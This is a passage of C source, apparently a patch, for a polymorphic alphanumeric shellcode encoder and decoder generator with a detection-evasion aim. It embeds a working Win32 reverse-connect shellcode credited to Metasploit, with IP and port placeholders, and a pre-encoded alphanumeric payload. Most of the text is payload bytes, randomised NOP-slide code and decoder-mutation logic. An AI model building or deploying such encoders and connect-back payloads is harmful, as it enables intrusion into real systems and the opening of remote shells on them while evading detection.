(alnum_nop[8]) --- [todo: need to preserve stack state] >--. 
//we can freely inc/dec esp for now -// "PX", //push eax;pop eax// (alnum_nop[9]) --- [todo: need to preserve stack state] >--| //but we need to take it into account -// "QY", //push ecx;pop ecx// (alnum_nop[10]) ---[todo: need to preserve stack state] >--| //once we start pushing/poping to/from -// "RZ", //push edx;pop edx// (alnum_nop[11]) ---[todo: need to preserve stack state] >--' //the stack. -// | -//TODO: <-----------------------------------------------------------------------------------' -// push eax push eax push eax push ecx push edx -// pop eax push ecx push ecx dec esp pop edx -// push ecx pop ecx push edx inc esp push ecx -// pop ecx pop eax inc esp pop ecx pop ecx -// push edx push edx dec esp push eax push eax -// pop edx pop edx pop edx inc esp pop eax -// pop ecx dec esp . -// pop eax pop eax . -// push edx . -// pop edx etc... - }; - UCHAR *nop_slide; - nop_slide = malloc(size); - memset(nop_slide, 0, size); - if(size%2) - { - append_dec_eax = 1; - size--; - } - for(i=0; i<(size/2); i++) { - do - x = rand()%(sizeof(alnum_nop)/3); - while - ((slide==2)&&(x==6||x==7)); - strcat(nop_slide, alnum_nop[x]); - } - if(append_dec_eax) - { - strcat(nop_slide, slide==1?"H":rand()%2?"G":"O"); //dec eax or inc/dec edi - depends on which nop slide - } - return nop_slide; -} - -UCHAR get_random_alnum_push_dword_opcode() -{ - UCHAR alnum_push_dword_opcode[] = - { - 'P', //0x50 push eax - 'Q', //0x51 push ecx - 'R', //0x52 push edx - 'S', //0x53 push ebx - 'T', //0x54 push esp - 'U', //0x55 push ebp - 'V', //0x56 push esi - 'W' //0x57 push edi - }; - return alnum_push_dword_opcode[rand()%sizeof(alnum_push_dword_opcode)]; -} - -UCHAR get_random_alnum_value() -{ - char alnum_values[] = ALNUM_CHARSET; - return alnum_values[rand()%strlen(alnum_values)]; -} - -UCHAR get_push_register_instruction(UCHAR *reg) -{ - if (!strcmp(reg, "eax")) return 'P'; //0x50 push eax - else if (!strcmp(reg, "ecx")) return 'Q'; //0x51 push ecx - else if (!strcmp(reg, "edx")) return 'R'; 
//0x52 push edx - else if (!strcmp(reg, "ebx")) return 'S'; //0x53 push ebx - else if (!strcmp(reg, "esp")) return 'T'; //0x54 push esp - else if (!strcmp(reg, "ebp")) return 'U'; //0x55 push ebp - else if (!strcmp(reg, "esi")) return 'V'; //0x56 push esi - else if (!strcmp(reg, "edi")) return 'W'; //0x57 push edi - else return 0; -} - -UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1) -{ - UCHAR states[11] = {0,1,2,3,4,5,6,7,8,9,10}; - UCHAR instructions[11][3]; - UCHAR instruction_comments[11][28]; - UINT i,c, state; - UCHAR *output; - UCHAR *random_states; - UCHAR *p_state[5]; - - output = malloc(17); - memset(output, 0, 17); - memset(instructions, 0, 11*3); - memset(instruction_comments, 0, 11*28); - instructions[0][0] = '\x6a'; //j - instructions[0][1] = xor_al1; // - instructions[1][0] = '\x58'; //X - instructions[2][0] = '\x34'; //4 - instructions[2][1] = xor_al1; // - instructions[3][0] = '\x48'; //H - instructions[4][0] = '\x34'; //4 - instructions[4][1] = jne_xor1; // - instructions[5][0] = '\x30'; //0 - instructions[5][1] = '\x42'; //B - instructions[5][2] = size_decoder-1; // - instructions[6][0] = '\x52'; //R - instructions[7][0] = '\x52'; //R - instructions[8][0] = '\x59'; //Y - instructions[9][0] = '\x47'; //G - instructions[10][0] = '\x43'; //C - - strcat(instruction_comments[0], "push XOR_AL1"); - strcat(instruction_comments[1], "pop eax"); - strcat(instruction_comments[2], "xor al, XOR_AL1"); - strcat(instruction_comments[3], "dec eax"); - strcat(instruction_comments[4], "xor al, JNE_XOR1"); - strcat(instruction_comments[5], "xor byte ptr [edx+size], al"); - strcat(instruction_comments[6], "push edx"); - strcat(instruction_comments[7], "push edx"); - strcat(instruction_comments[8], "pop ecx"); - strcat(instruction_comments[9], "inc edi"); - strcat(instruction_comments[10], "inc ebx"); - do { - memset(p_state, 0, sizeof(UCHAR*)*5); - random_states = shuffle(states, 11); - - //.*0.*1.*2.*3.*4.*5 - 
p_state[0] = memchr(random_states, 0, 11); - if(p_state[0]) - p_state[1] = memchr(p_state[0], 1, 11-(p_state[0]-random_states)); - if(p_state[1]) - p_state[1] = memchr(p_state[1], 2, 11-(p_state[1]-random_states)); - if(p_state[1]) - p_state[1] = memchr(p_state[1], 3, 11-(p_state[1]-random_states)); - if(p_state[1]) - p_state[1] = memchr(p_state[1], 4, 11-(p_state[1]-random_states)); - if(p_state[1]) - p_state[1] = memchr(p_state[1], 5, 11-(p_state[1]-random_states)); - - //.*[67].*8 - if(p_state[1]) - { - p_state[2] = memchr(random_states, 6, 11); - p_state[3] = memchr(p_state[2], 8, 11-(p_state[2]-random_states)); - if(!p_state[3]) - { - p_state[2] = memchr(random_states, 7, 11); - p_state[3] = memchr(p_state[2], 8, 11-(p_state[2]-random_states)); - } - if(p_state[3]) - { - //.*1.*[67].*[67] - if(p_state[2] && p_state[1] < p_state[2]) - p_state[4] = memchr(p_state[2], *p_state[2]==6?7:6, 11-(p_state[2]-random_states)); - - //.*0.*[67].*8.*1 - if(!p_state[4]) - p_state[4] = memchr(p_state[0], 6, 11-(p_state[0]-random_states)); - if(!p_state[4]) - p_state[4] = memchr(p_state[0], 7, 11-(p_state[0]-random_states)); - if(p_state[4]) - p_state[4] = memchr(p_state[4], 8, 11-(p_state[4]-random_states)); - if(p_state[4]) - p_state[4] = memchr(p_state[4], 1, 11-(p_state[4]-random_states)); - - //.*[67].*8.*0.*1.*[67] - if(!p_state[4]) - p_state[4] = memchr(p_state[3], 0, 11-(p_state[3]-random_states)); - if(p_state[4]) - p_state[4] = memchr(p_state[4], 1, 11-(p_state[3]-random_states)); - if(p_state[4]) - p_state[4] = memchr(p_state[4], *p_state[3]==6?7:6, 11-(p_state[4]-random_states)); - } - } - - } - while (!p_state[4]); - - for (c=state=0; state. + + +-----------+ + WORKS CITED + +-----------+ + +--------------------------------------------------------------------------------------------------+ + |Matt Conover, Soren Macbeth, Avri Schneider 05 October 2004 | + |Encode2Alnum (polymorphic alphanumeric decoder/encoder) | + |Full-Disclosure | + | | + |CLET Team. Aug. 
2003 |
+ |Polymorphic Shellcode Engine |
+ |Phrack |
+ | |
+ |Ionescu, Costin. 1 July 2003 |
+ |Re: GetPC code (was: Shellcode from ASCII) |
+ |Vuln-Dev |
+ | |
+ |rix. Aug. 2001 |
+ |Writing ia32 alphanumeric shellcodes |
+ |Phrack |
+ | |
+ |Wever, Berend-Jan. 28 Jan. 2001 |
+ |Alphanumeric GetPC code |
+ |Vuln-Dev |
+ |ALPHA3 |
+ +--------------------------------------------------------------------------------------------------+
+//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+*/
+#include
+#include
+#include
+
+#define MAX_BYTES 0x100
+#define MAX_ENCODED_SHELLCODE 2000 //this will be allocated on the stack
+#define MIN_IP_STR_LEN 7
+#define MAX_IP_STR_LEN 15
+
+#define OFFSET_XOR_AL1_A 15
+#define OFFSET_XOR_AL1_B 18
+#define OFFSET_XOR_AL2_A 37
+#define OFFSET_XOR_AL2_B 40
+#define OFFSET_PUSH_DWORD1 0
+#define OFFSET_PUSH_DWORD2 1
+#define OFFSET_PUSH_DWORD3 4
+#define OFFSET_PUSH_DWORD4 12
+#define OFFSET_RANDOMIZED_DECODER_HEAD 14
+#define SIZE_RANDOMIZED_DECODER_HEAD 16
+BYTE EncodedShellcode[] = // encoded 336 bytes
+ "PZhUQPTX5UQPTHHH4D0B8RYkA9YA3A9A2B90B9BhPTRWX5PTRW4r8B9ugxPqy8xO"
+ "wck4WTyhlLlUjyhukHqGCixVLt4UTCBRwsV3pRod8OLMKO9FXJVTJJbJX4gsVXAt"
+ "Q3ukAxFmVIw7HyBfDyNv5zXqg4PQeTxZJLm56vRjSidjSz75mHb2RL5Hl30tUmnH"
+ "HtXEv7oZVdiEv1QwWijcgVk4CZn7NI3uRai32AZ7FS0Iq1cwWc5T5RlnTIiKJVmq"
+ "4T4MElucobfP4vWyB0OfB34JRJ9T4zjLlbKmlk7jTicj11869F001uAdTZKNJ7wL"
+ "mOv5mLlGPKFLtNI2525WhktKDO0NIlseHIuJ33xv7xGQAW55eZKXHw78zfvCI2U0"
+ "9Ulw5ZZhynmxG7JZZgJAYbg1MEp5QcOv7AYkYfcHQDWVMlJnzOSh8nzg1NZZn5Px"
+ "11U5INVEtvZOS1E094HqmbB6K1MfRIq7KQyNOeL7NHI1Xnwhyhy69bg2bTexGnkc"
+ "CEt90vn3DaFxGaFuRIPg0NK40kdg0L9ImaFbGy1Wl7JyGeJByHdfRCSYzvCzVa2v"
+ "RtQWG5lxRMN1CZREvyKFvfwij3X2P81J1wk9ZLmGAqxGPuQv7RBX411iaWKCLGnD"
+ "kwRZKREaRis5V7c5ILxKfAx6MbH40T53PnX9ZwSWtYzbHwCzkS0Ev5iVmLmS3xSk"
+ "1telLPYuGyNvX1TyJ3yLdOwckr";
+
+// example: make encoder choose more uppercase bytes...
+#define ADDITIONAL_CHARSET "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+
+#define ALNUM_CHARSET ADDITIONAL_CHARSET "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" // <--- allowed charset
+ // feel free to
+//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////change - YMMV
+#define REGISTER_WITH_ADDRESS_OF_SHELLCODE esp // <--- change this to the register holding the address of the decoder////////////
+#define _Q(str) #str
+#define Q(str) _Q(str)
+#define P(str) #str ##" // <--- buffer offset\n"## _Q(str)
+///////////////////////////////////
+#define CONNECT_BACK_SHELLCODE //
+//#undef CONNECT_BACK_SHELLCODE //undefine CONNECT_BACK_SHELLCODE to use your own - and place it in shellcode[] >-----------------.
+ /////////////////////////////////////////////////////////////////// |
+int main(); // |
+UCHAR *scan_str_known_pattern(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length); // |
+UCHAR get_push_register_instruction(UCHAR *reg); // |
+UCHAR get_random_alnum_value(); // |
+UCHAR get_random_alnum_push_dword_opcode(); // |
+UCHAR *get_nop_slide(UINT size, UINT slide); /////// |
+UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide);// |
+UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide); // |
+UCHAR *shuffle(UCHAR str[], UINT length); /////// |
+DWORD my_htonl(DWORD dw_in); // |
+DWORD ip_str_to_dw(UCHAR *str); // |
+BOOL terminating_key_exist(UCHAR *alnum_shellcode, UCHAR *terminating_key); // |
+BOOL is_alnum(UCHAR c); // |
+BOOL str_is_alnum(UCHAR *str); // |
+UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index); // |
+UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1); // |
+struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c); // |
+struct xor2_key *choose_random_node(struct xor2_key *head); // |
+void free_p_xor2_key(struct xor2_key *node); // |
+ // |
+struct xor2_key { // |
+ UCHAR xor2; // |
+ UCHAR key; // |
+ struct xor2_key *prev; // |
+ struct xor2_key *next; // |
+} xor2_key; // |
+ // |
+ // |
+// Title: Win32 Reverse Connect // |
+// Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 // |
+// Author: hdm[at]metasploit.com // |
+#ifdef CONNECT_BACK_SHELLCODE // |
+ #define OFFSET_IP_ADDRESS 154 // |
+ #define OFFSET_TCP_PORT_NUMBER 159 // |
+ #define IP_ADDRESS "127.0.0.1" // |
+ #define TCP_PORT_NUMBER 123 // |
+ DWORD ip_address; // |
+ UCHAR shellcode[] = // |
+ "\xe8\x30\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xec\xf9\xaa" // |
+ "\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x8e\x4e\x0e\xec\x7e\xd8\xe2" // |
+ "\x73\xad\xd9\x05\xce\x72\xfe\xb3\x16\x57\x53\x32\x5f\x33\x32\x2e" // |
+ "\x44\x4c\x4c\x00\x01\x5b\x54\x89\xe5\x89\x5d\x00\x6a\x30\x59\x64" // |
+ "\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x0c\x8d\x57" // |
+ "\x24\x51\x52\xff\xd0\x89\xc3\x59\xeb\x10\x6a\x08\x5e\x01\xee\x6a" // |
+ "\x08\x59\x8b\x7d\x00\x80\xf9\x04\x74\xe4\x51\x53\xff\x34\x8f\xe8" // |
+ "\x83\x00\x00\x00\x59\x89\x04\x8e\xe2\xeb\x31\xff\x66\x81\xec\x90" // |
+ "\x01\x54\x68\x01\x01\x00\x00\xff\x55\x18\x57\x57\x57\x57\x47\x57" // |
+ "\x47\x57\xff\x55\x14\x89\xc3\x31\xff\x68" // |
+ "IPIP" // I.P.
address // |
+ "\x68" // |
+ "PORT" // TCP port number // |
+ "\x89\xe1\x6a\x10\x51\x53\xff\x55\x10\x85\xc0\x75\x44\x8d\x3c\x24" // |
+ "\x31\xc0\x6a\x15\x59\xf3\xab\xc6\x44\x24\x10\x44\xfe\x44\x24\x3d" // |
+ "\x89\x5c\x24\x48\x89\x5c\x24\x4c\x89\x5c\x24\x50\x8d\x44\x24\x10" // |
+ "\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\xff\x75\x00\x51\xff\x55" // |
+ "\x28\x89\xe1\x68\xff\xff\xff\xff\xff\x31\xff\x55\x24\x57\xff\x55" // |
+ "\x0c\xff\x55\x20\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c\x8b" // |
+ "\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32\x49" // |
+ "\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07\xc1" // |
+ "\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24\x01" // |
+ "\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\xeb" // |
+ "\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00"; // |
+#else ////////////////////////////////////// |
+ UCHAR shellcode[] = "\xCC YOUR SHELLCODE GOES HERE \xCC"; // <----------------- here ------------------------------------------'
+#endif //
+DWORD size = sizeof(shellcode)-1; //
+ //
+int main() { /////////////////////////////////////////////////////////
+ //(decoder address is in ecx when decoder starts) //
+ UCHAR PUSH_REGISTER_WITH_DECODER_ADDRESS = get_push_register_instruction(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE)); // >----------.
+// // |
+#define END_OF_ENCODED_SHELLCODE 'A','L','D','N' // this is the terminating string of the encoded shellcode // |
+ UCHAR str_end_of_encoded_shellcode[]= {END_OF_ENCODED_SHELLCODE}; //////////////////////////////////////////////// |
+ UCHAR xor_al1 = get_random_alnum_value(); // this is used to zero out AL the first time |
+ UCHAR xor_al2 = get_random_alnum_value(); // this is used to zero out AL the second time |
+ int offset_imul_key = '\xC1';//////////////////////// |
+ int jne_xor1 = '\xC2';// >---------------------------------------------------------.
| + int jne_xor2 = '\xC3';// >--------------------------------------------------------------| | + // you would need to play with these two values if you want to reduce | | + // the size of the NOP slides - they obviously need to stay alnum. | | + // You could also play with the value of AL before the XOR is done | | + // to get your desired negative offset. keep in mind that it will cost | | + // you instructions to get al to the value you want (if you use xor of | | + // two alphanumeric bytes, you would need to push first alphanumeric | | + // char to the stack, pop eax, then xor it with it's alnum complement) | | + // This playing around would result in an even harder to detect decoder | | + // as the offsets would be different | | + int size_decoder ='\xC4'; // | | + int half_size_decoder ='\xC5'; //////////////////////////////////////////////////////////////////// | | + UCHAR imul_instruction_1 ='\x6B'; // | | + UCHAR imul_instruction_2 ='\x41'; // | | + UCHAR imul_instruction_3 ='\xC6'; //size of decoder+1 // | | + UCHAR imul_instruction_4 ='\xC7'; //initial key (random alnum) // | | + // // | | + UINT column=0, i=0; /////////////////////////////// | | + UCHAR *alnum = ALNUM_CHARSET; // | | + UCHAR *p_alnum = alnum; // | | + UCHAR decoder[] = // | | + { //////////////////////////////////////////////////////////////////////////////// | | + // | | + //[step_1] -- multiply first encoded byte with key | | + //[step_2] -- xor result of step_1 with second encoded byte to get the decoded byte | | + // | | + // Each binary byte is encoded into three alphanumeric bytes. | | + // The first byte multipled by the third byte xor'ed against the second byte yeilds the original | | + // binary byte. 
| | + // | | + // TODO: | | + // .--(first byte ^ second byte) * third byte | | + // '--(second byte ^ first byte) * third byte | | + // | | + // .--(first byte ^ third byte) * second byte | | + // '--(third byte ^ first byte) * second byte | | + // | | + // .--(second byte ^ third byte) * first byte | | + // '--(third byte ^ second byte) * first byte | | + // | | + // .--(first byte * second byte) ^ third byte | | + // '--(second byte * first byte) ^ third byte | | + // | | + // .--(first byte * third byte) ^ second byte <-- decoder/encoder implemented | | + // '--(third byte * first byte) ^ second byte <-- decoder implemented (same encoder) | | + // | | + // .--(second byte * third byte) ^ first byte | | + // '--(third byte * second byte) ^ first byte | | + // | | + // | | + // The above is divided into pairs, each pair has the same values (in parenthesis) just at different offsets, | | + // and we can switch them around with no effect. Each option requires a different decoder, but each pair can use the | | + // same encoder. | | + // | | + /////////// DECODER HEAD (will be randomized by sliding instructions) //////// >----------------------------------|----|---. + /* 1*/ '\x50', //push ??? (this can change) // [eax = address of decoder]------+ | | | + /* 2*/ '\x50', //push ??? (this can change) // [ecx = address of decoder]------+ | | | + /* 3*/ PUSH_REGISTER_WITH_DECODER_ADDRESS, //push reg (decoder address) // [edx = address of decoder]------+ | | | + /* 4*/ PUSH_REGISTER_WITH_DECODER_ADDRESS, //push reg (base offset for cmp) // [ebx = address of decoder]------+ | | | + /* 5*/ '\x50', //push ??? (this can change) // [esp = address of decoder]------+ | | | + /* 7*/ '\x6A', half_size_decoder, //push 35h (word offset for cmp) // [ebp = decoder size / 2]--------+ | | | + /*12*/ '\x68', END_OF_ENCODED_SHELLCODE, //push END_OF_ENCODED_SHELLCODE // [esi = 4 bytes terminating key]>+ | | | + /*13*/ '\x50', //push ??? 
(this can change) // [edi = address of decoder]------+ | | | + /*14*/ '\x61', //popad // [set all registers] <-----------' | | | + /*16*/ '\x6A', xor_al1, //last decoder byte=0xB1 //push XOR_AL1 [JNE_XOR1^0xFF=al^JNE_XOR2=last byte==0xB1] >----. | | | + /*17*/ '\x58', //pop eax <-------------------------------------------------' | | | + /*19*/ '\x34', xor_al1, //xor al,XOR_AL1 [al = 0x00] | | | + /*20*/ '\x48', //dec eax [al = 0xFF] [you can play with AL here...]<----' | | + /*22*/ '\x34', jne_xor1, //xor al,JNE_XOR1 [al = 0xFF ^ JNE_XOR1] | | + /*25*/ '\x30', '\x42', size_decoder-1, //xor byte ptr [edx+size],al >--change-last-byte--. | | + /*26*/ '\x52', //push edx [save decoder address on stack] | | | + /*27*/ '\x52', //push edx >----. | | | + /*28*/ '\x59', //pop ecx <------' [ecx = address of decoder] | | | + /*29*/ '\x47', //inc edi we increment ebx keeping the decoder | | | + /*30*/ '\x43', //inc ebx length non-even (edi is unused) | | | + //////////////// DECODER_LOOP_START /////////////////////////////////////////// | | | + /*31*/ '\x58', //get address of the decoder //pop eax <---------. <--|-----------------. | | + /*32*/ '\x52', //save edx //push edx [can use edx now]>---------------|----|---------------. | | | + /*33*/ '\x51', //save ecx //push ecx [can use ecx now] >------------|----|-------------. | | | | + /*34*/ '\x50', //save address of decoder //push eax [can use eax now] >---------|----|-----------. | | | | | + /*35*/ '\x50', //save eax //push eax >----. | | | | | | | | + /*36*/ '\x5A', //restore into edx //pop edx <------' | | | | | | | | + /*38*/ '\x6A', xor_al2, //zero out al //push XOR_AL2 [al = 0] >----. | | | | | | | | + /*39*/ '\x58', //zero out al //pop eax | | | | | | | | | + /*41*/ '\x34', xor_al2, //zero out al //xor al,XOR_AL2 <----------' | | | | | | | | + /*42*/ '\x50', //save al on the stack (al=0)//push eax >-----------------. 
| | | | | | | | + /*45*/ '\x32', '\x42', offset_imul_key, //xor al,byte ptr [edx+off] | | | | | | | | | + /*48*/ '\x30', '\x42', offset_imul_key, //xor byte ptr [edx+off],al >--this-zero's-the-key----. | | | | | | + /*49*/ '\x58', //restore al from the stack (al=0)//pop eax <----------------------' | | | | | | | | | + /*52*/ '\x32', '\x41', size_decoder+2, // get key in al //xor al,byte ptr [ecx+size+2] | | | | | | | | | + /*55*/ '\x30', '\x42', offset_imul_key, //xor byte ptr [edx+off],al >---this-changes-the-key--|----. | | | | | | + /*56*/ '\x58', //restore address of decoder //pop eax <---------------------------------|----|---|----|--' | | | | | + /*57*/ '\x59', //restore ecx [word offset] //pop ecx <------------------------------|----|---|----|----' | | | | + /*58*/ '\x5A', //restore edx [byte offset] //pop edx <---------------------------|----|---|----|------' | | | + /*59*/ '\x50', //save address of decoder //push eax >---------------------------------|----|---|----|--------' | | + /////////// START NOP_SLIDE_1 ///////////////////////////////////////////////// | | | | | | + /*60*/ '\x41',/////////////////////////////////////inc ecx/////////////////////////// | | | | | | + /*61*/ '\x49',/////////////////////////////////////dec ecx/////////////////////////// | | | | | | + /*62*/ '\x41',/////////////////////////////////////inc ecx/////////////////////////// | | | | | | + /*63*/ '\x49',/////////////////////////////////////dec ecx+-----------------------+// | | | | | | + /*64*/ '\x41',// IMUL can go here and bellow //inc ecx| |// | | | | | | + /*65*/ '\x49',// //dec ecx| 16 bytes |// | | | | | | + /*66*/ '\x41',// //inc ecx| NOP slide |// | | | | | | + /*67*/ '\x49',// //dec ecx| |// | | | | | | + /*68*/ '\x41',// //inc ebx| can mungle eax until |// | | | | | | + /*69*/ '\x49',// will be randomized //dec ebx| IMUL_INSTRUCTION |// | | | | | | + /*70*/ '\x41',// //inc edx| |// | | | | | | + /*71*/ '\x49',// //dec edx| |// | | | | | | + /*72*/ '\x41',// //inc esi| 
|// | | | | | | + /*73*/ '\x49',// //dec esi+-----------------------+// | | | | | | + /*74*/ '\x41',// //push eax/////////////////////////// | | | | | | + /*75*/ '\x49',// //pop eax//////////////////////// // | | | | | | + //////////// END NOP_SLIDE_1 ////////////////////////////////////////////////// | | | | | | + // | | | | | | + // We can move around the IMUL_INSTRUCTION inside the NOP slides - but not before | | | | | | + // MAX_OFFSET_OFFSET_IMUL i.e. we can't move it before the first 4 bytes of NOP_SLIDE_1 | | | | | | + // or the offset will not be alphanumeric. | | | | | | + // | | | | | | + // We need to move the IMUL_INSTRUCTION in two byte increments, as we may modify eax in | | | | | | + // NOP_SLIDE_1 and we can't change eax after the IMUL_INSTRUCTION (as the result goes | | | | | | + // into eax) - this limitation can be overcome if we make sure not to modify eax after | | | | | | + // the IMUL_INSTRUCTION - and it is easy enough, as we don't care about eax' value at | | | | | | + // all - so we don't need to restore it. We can simply increment or decrement an unused | | | | | | + // register instead. We happen to have such a register - edi =] | | | | | | + // | | | | | | + // So in NOP_SLIDE_1, we can't use push eax;pop eax unless they will not be split by | | | | | | + // the IMUL_INSTRUCTION - because we would need the value of eax after the imul, and | | | | | | + // the pop eax would overwrite it | | | | | | + // | | | | | | + // But we could use a dec eax;inc edi or a dec eax;dec edi combinations (inc eax is not | | | | | | + // alphanumeric.). | | | | | | + // | | | | | | + // -OBSOLETE- | | | | | | + // I have set here the IMUL_INSTRUCTION between NOP_SLIDE_1 and NOP_SLIDE_2 | | | | | | + // If you wish to move it up, you will need to move it up by an even number of bytes. 
| | | | | | + // You will then need to change OFFSET_OFFSET_IMUL accordingly | | | | | | + // (add the number of bytes to it) | | | | | | + // If you wish to move it down, you will need to move it down by an even number of | | | | | | + // bytes. | | | | | | + // You will then need to change OFFSET_OFFSET_IMUL accordingly | | | | | | + // (deduct the number of bytes from it) | | | | | | + // | | | | | | + // TODO: make a routine that moves it around randomally between allowed values | | | | | | + // and sets the proper offsets | | | | | | + // this routine should be called after the NOP slides have been randomized. | | | | | | + // | | | | | | + ////////// START NOP_SLIDE_2 //////////////////////////////////////////////////// | | | | | | + /*76*/ '\x41',// //inc ecx/////////////////////////// | | | | | | + /*77*/ '\x49',// //dec ecx/////////////////////////// | | | | | | + /*78*/ '\x41',// //inc ebx/////////////////////////// | | | | | | + /*79*/ '\x49',// //dec ebx+-----------------------+// | | | | | | + /*80*/ '\x41',// will be randomized //inc edx| |// | | | | | | + /*81*/ '\x49',// //dec edx| 12 bytes |// | | | | | | + /*82*/ '\x41',// //inc esi| NOP slide |// | | | | | | + /*83*/ '\x49',// //dec esi| |// | | | | | | + /*84*/ '\x41',// //push eax| |// | | | | | | + /*85*/ '\x49',// //pop eax| |// | | | | | | + /*86*/ '\x41',// //inc ecx+-----------------------+// | | | | | | + /*87*/ '\x49',// //dec ecx/////////////////////////// | | | | | | + // IMUL can go down to here | | | | | | + ///////// [step_1] //imul eax,dword ptr [ecx+size_decoder+1],45h | | | | | | + /*91*/imul_instruction_1, imul_instruction_2, imul_instruction_3, imul_instruction_4,// <-This-key-will-change-' | | + ////////// END NOP_SLIDE_2//////////////////////////////////////////////////// | | | | + /*92 */ '\x41', //ecx incremented once //inc ecx ---------------------. 
| | | | + /*95 */ '\x33', '\x41', size_decoder, //[step_2]//xor eax,dword ptr [ecx+size] | <--------------------store decoded | | + /*98 */ '\x32', '\x42', size_decoder, //xor al,byte ptr [edx+size] |ecx = ecx+2 | | byte | | + /*101*/ '\x30', '\x42', size_decoder, //xor byte ptr [edx+size],al | | |(eax=result of IMUL) | | + /*102*/ '\x41', //ecx incremented twice //inc ecx ---------------------' | | | | + /*103*/ '\x42', //edx incremented once //inc edx edx = edx+1 | | | | + /*104*/ '\x45', //ebp incremented once //inc ebp | | | | + /*107*/ '\x39', '\x34', '\x6B', //cmp dword ptr [ebx+ebp*2],esi // check if we reached the end | | + /*109*/ '\x75', jne_xor2, // <===0xB1 //jne DECODER_LOOP_START >--------------' <--' | | + '\x00' // If you change the length of the decoder, the jne would need to jump to a different offset than 0xB1 | | + };////////////////////////////////////////////////// | | + UINT shrink; // | | + UCHAR *found_msg; // | | + UCHAR *p_decoder = decoder; // | | + UCHAR xor1, xor2, key; // | | + UCHAR temp_buf[3] = ""; // | | + UCHAR alnum_shellcode[MAX_ENCODED_SHELLCODE] = "";// | | + UCHAR *p_alnum_shellcode = alnum_shellcode; // todo: allow for the key to be either the first, | | + struct xor2_key *p_xor2_key = 0; // the second or the third byte (currently third). 
| | + UCHAR *p_shellcode = shellcode; // | | + void *_eip = 0; // | | + // | | + int offset_nop_slide1; // | | + int offset_nop_slide2; // | | + int offset_half_size_decoder; // | | + int offset_terminating_key; // | | + int offset_imul_instruction1; // | | + int offset_imul_instruction2; // | | + int offset_imul_instruction3; // | | + int offset_imul_instruction4; // | | + int negative_offset_size_decoder1; // | | + int negative_offset_size_decoder2; // | | + int negative_offset_size_decoder3; // | | + int offset_size_decoder_min_1; // | | + int offset_size_decoder_pls_2; // | | + int offset_imul_key_offset1; // | | + int offset_imul_key_offset2; // | | + int offset_imul_key_offset3; // | | + int offset_imul_instruction; // | | + int size_nop_slide1; // | | + int size_nop_slide2; // | | + int offset_jne_xor1; // | | + int offset_jne_xor2; // | | + int decoder_length_section1; // | | + int decoder_length_section2; // | | + int decoder_length_section3; // | | + int imul_instruction_length; // | | + int jne_xor_negative_offset; // | | + int backward_slide_offset; // | | + BOOL decoder_version_1; // | | + UINT srand_value; // | | +#ifdef CONNECT_BACK_SHELLCODE ///////////////////////////////////////////// | | + printf("scanning EncodedShellcode for shellcode up to OFFSET_IP_ADDRESS bytes\n"); // | | + found_msg = scan_str_known_pattern(EncodedShellcode, shellcode, OFFSET_IP_ADDRESS); // | | + if (found_msg) printf("shellcode found encoded in EncodedShellcode using %s.\n", found_msg); // | | + else printf("shellcode not found encoded in EncodedShellcode.\n");///////////////////////////// | | +#endif ////////////////// | | + printf("shellcode length:%d\n", size); // | | + srand_value = time(NULL); // | | +// srand_value = ; // for debugging | | + srand(srand_value); // | | + printf("srand value=%d\n", srand_value); // | | + decoder_version_1 = rand() % 2; // | | + ///// | | + size_decoder = strlen(decoder);// | | + decoder_length_section1 = 30; ////////////// | | + 
decoder_length_section2 = 29; // | | + decoder_length_section3 = 18; // | | + // | | + size_nop_slide1 = 28; // | | + size_nop_slide2 = 0; // | | + // | | + imul_instruction_length = 4; // | | + // | | + shrink = (rand()%6)*2; //////////////////////////////////////////////////// (can shrink up to 10 bytes | | + memmove(decoder+decoder_length_section1+decoder_length_section2+size_nop_slide1-shrink, // in 2 byte increments) | | + decoder+decoder_length_section1+decoder_length_section2+size_nop_slide1, // | | + imul_instruction_length+size_nop_slide2+decoder_length_section3+1); // | | + size_decoder -=shrink; /////////////////////////////////////////////////////// | | + half_size_decoder = size_decoder/2; // | | + size_nop_slide1 -=shrink; ///////////////////////// | | + printf("shrinking decoder by: %d\n", shrink); // | | + // | | + offset_imul_instruction = decoder_length_section1+// | | + decoder_length_section2+// | | + size_nop_slide1;////////// | | + // | | + backward_slide_offset = rand() % 15; // (selects a number from 0 to 14 in increments of 1) | | + strncpy(decoder, // | | + slide_substr_back(decoder, // | | + offset_imul_instruction, // | | + imul_instruction_length, // | | + size_decoder, ///// | | + backward_slide_offset), // | | + size_decoder); // | | + offset_imul_instruction -=backward_slide_offset; // | | + size_nop_slide1 -=backward_slide_offset; // | | + size_nop_slide2 +=backward_slide_offset; ////////////// | | + printf("backward_slide_offset = %d\n", backward_slide_offset);// | | + /////////////////////////////////// | | + negative_offset_size_decoder1 = 9; // | | + negative_offset_size_decoder2 = 12; // | | + negative_offset_size_decoder3 = 15; // | | + 